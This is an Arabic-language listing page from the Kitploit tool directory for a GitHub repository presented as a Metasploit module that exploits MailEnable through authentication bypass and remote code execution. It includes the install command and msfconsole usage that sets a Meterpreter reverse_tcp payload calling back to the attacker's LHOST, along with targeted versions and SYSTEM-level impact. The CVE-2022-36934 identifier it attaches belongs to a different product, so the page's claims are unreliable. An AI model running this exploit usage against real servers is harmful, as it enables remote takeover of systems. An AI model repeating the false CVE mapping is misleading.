Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
mailenable-cve-2022-36934 — وحدة Metasploit لـ MailEnable CVE-2022-36934 لتجاوز المصادقة وتنفيذ التعليمات البرمجية عن بُعد (RCE) | Kitploit
أدوات/GitHubGitHub/tdawg506/mailenable-cve-2022-36934
أطر الاستغلالتحليل الثغرات الأمنيةاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعدتطوير الحمولات
GitHubtdawg506/mailenable-cve-2022-36934

mailenable-cve-2022-36934

وحدة Metasploit لـ MailEnable CVE-2022-36934 لتجاوز المصادقة وتنفيذ التعليمات البرمجية عن بُعد (RCE)

عرض المستودع
9منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

وحدة استغلال MailEnable CVE-2022-36934

Metasploit License

وحدة Metasploit لثغرة تجاوز المصادقة في MailEnable (CVE-2022-36934)، والتي تؤدي إلى تنفيذ تعليمات برمجية عن بُعد.

📌 الميزات

  • تستغل عدم تعقيم المدخلات بشكل صحيح في SMTP/POP3 في MailEnable
  • تدعم أهداف Windows بمعماريتي x86 وx64
  • لا تتطلب تفاعل المستخدم (يتم التشغيل تلقائيًا عبر بريد إلكتروني مُعد خصيصًا)
  • تعمل ضد إصدارات MailEnable الأقل من 10.40

🚀 التركيب

  1. انسخ إلى دليل وحدات Metasploit:
    cp modules/exploits/windows/smtp/mailenable_authbypass_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/smtp/
    
    
  2. أعد تحميل الوحدات في msfconsole:

reload_all

  1. الاستخدام:

use exploit/windows/smtp/mailenable_authbypass_rce set RHOSTS <target_ip> set LHOST <your_ip> set PAYLOAD windows/x64/meterpreter/reverse_tcp exploit

🎯 تم الاختبار ضد:

MailEnable Professional 10.25 Windows Server 2019 MailEnable Enterprise 10.30 Windows Server 2016

📝 التفاصيل التقنية:

الثغرة: تجاوز المصادقة عبر صيغة شبيهة بـ SQLi في SMTP/POP3

ناقل الهجوم: الشبكة (المنافذ 25/110)

الامتيازات: يعمل بحساب خدمة MailEnable (غالبًا بـ SYSTEM)

⚠️ إخلاء مسؤولية قانوني:

هذه الأداة مخصصة للاختبار المصرح به فقط. لا تستخدمها أبدًا ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.

تنزيل الأداة